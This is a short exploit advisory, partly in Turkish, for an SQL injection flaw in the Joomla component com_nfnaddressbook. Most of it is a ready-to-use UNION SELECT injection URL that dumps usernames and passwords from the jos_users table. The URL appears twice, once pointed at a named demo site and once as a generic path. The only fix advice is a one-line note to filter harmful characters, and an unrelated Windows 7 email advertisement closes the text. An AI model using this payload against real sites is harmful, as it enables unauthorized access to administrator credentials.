<------------------- header data start ------------------- > ################################################################ Joomla Component com_nfnaddressbook SQL injection Vulnerability ############################################################### # author : Fl0riX # Name : com_nfnaddressbook # Bug Type : SQL Injection # Infection : Admin login bilgileri alınabilir. # Demo Vuln. : http://www.joomlaportaldemo.com/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=2/**/and/**/1=0/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users-- # Bug Fix Advice : Zararlı karakterler filtrelenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > path/index.php?option=com_nfnaddressbook&Itemid=61&action=viewrecord&record_id=2/**/and/**/1=0/**/union/**/select/**/1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users-- < -- bug code end of -- > _________________________________________________________________ Yeni Windows 7: Size en uygun bilgisayarı bulun. Daha fazla bilgi edinin. http://windows.microsoft.com/shop